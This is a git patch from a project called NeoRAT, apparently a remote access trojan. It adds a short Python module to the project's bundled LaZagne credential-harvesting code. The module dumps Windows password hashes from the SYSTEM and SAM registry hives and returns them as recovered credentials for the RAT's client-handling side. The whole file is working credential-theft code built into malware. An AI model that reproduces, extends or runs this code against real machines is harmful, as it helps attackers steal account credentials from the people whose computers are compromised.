From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../client_handling/lazagne/softwares/windows/hashdump.py | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/hashdump.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/hashdump.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/hashdump.py b/foreign/client_handling/lazagne/softwares/windows/hashdump.py
new file mode 100644
index 0000000..2d53f28
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/hashdump.py
@@ -0,0 +1,15 @@
+# -*- coding: utf-8 -*- 
+from .creddump7.win32.hashdump import dump_file_hashes
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class Hashdump(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'hashdump', 'windows', system_module=True)
+
+    def run(self):
+        hashdump = dump_file_hashes(constant.hives['system'], constant.hives['sam'])
+        if hashdump:
+            pwd_found = ['__Hashdump__', hashdump]
+            return pwd_found
-- 
cgit v1.2.3